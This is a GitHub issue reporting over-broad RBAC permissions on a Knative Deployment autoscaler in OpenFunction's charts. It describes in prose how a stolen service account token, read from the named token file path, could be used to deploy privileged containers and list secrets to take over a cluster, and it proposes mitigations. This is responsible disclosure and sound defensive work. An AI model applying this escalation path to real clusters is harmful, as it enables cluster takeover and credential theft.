Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Deployment autoscaler has too much RBAC permission which may leads the whole cluster being hijacked #65

Open
Yseona opened this issue May 2, 2024 · 1 comment

Comments

@Yseona
Copy link

Yseona commented May 2, 2024

Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.

Description

The bug is that the Deployment autoscaler in the charts has too much RBAC permission than it needs, which may cause some security problems, and the worse one leads cluster being hijacked. The problem is that the autoscaler  is bound to two clusterroles (knative-serving-admin-rbac.yaml#L4) and knative-serving-aggregated-addressable-resolver-rbac.yaml#L4) with the following sensitive permissions authorized by aggregation rules (knative-serving-core-rbac.yaml#L6 and knative-serving-addressable-resolver-rbac.yaml#L6):

  • create/patch/update verb of the deployments resource (ClusterRole)
  • list/get verb of the secrets resource (ClusterRole)

After reading the source code of knative (which is an upstream project, not a part of openfunction), I didn't find any Kubernetes API usages using these permissions. However, these unused permissions may have some potential risks:

  • create/patch/update verb of the deployments resource
    • A malicious user can create a privileged container with a malicious container image capable of container escape. This would allow him/she gaining ROOT privilege of the worker node the created container deployed. Since the malicious user can control the pod scheduling parameters (e.g., replicas number, node affinity, …), he/she should be able to deploy the malicious container to every (or almost every) worker node. This means the malicious user will be able to control every (or almost every) worker node in the cluster.
  • list/get verb of the secrets resource
    • A malicious user can get/list all the secrets in the cluster (since this is declared in a ClusterRole), including database passwords, tokens of external cloud servers, etc. Even worse, if the cluster admin's token is stored in the cluster secret, he/she can use it to make a cluster-level privilege escalation. This means the malicious user will be able to hijack the whole cluster

The malicious users only need to get the service account token to perform the above attacks. There are several ways have already been reported in the real world to achieve this:

  • Supply chain attacks: Like the xz backdoor in the recent. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
  • RCE vulnerability in the APP: Any remote-code-execution vulnerability that can read local files can achieve this.

Mitigation Suggestion

  • Create a separate service account and remove all the unnecessary permissions
  • Write Kyverno or OPA/Gatekeeper policy to:
    • Limit the container image, entrypoint and commands of newly created pods. This would effectively avoid the creation of malicious containers.
    • Restrict the securityContext of newly created pods, especially enforcing the securityContext.privileged and securityContext.allowPrivilegeEscalation to false. This would prevent the attacker from escaping the malicious container. In old Kubernetes versions, PodSecurityPolicy can also be used to achive this (it is deprecated in v1.21).

Few Questions

  • Would these mitigation suggestions be applicable for the openfunction?
  • Our team have also found other unneccessary permissions (which is not that sensitive as above, but could also cause some security issues). Please tell us if you are interested in it. We’ll be happy to share it or PR a fix.

References

Several CVEs had already been assigned in other projects for similar issues:

@Yseona
Copy link
Author

Yseona commented May 6, 2024

Hi community:
I noticed that this issue hasn't been answered yet, please feel free to let me know if you need more information. Our team is happy to cooperate and do what we can to resolve this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant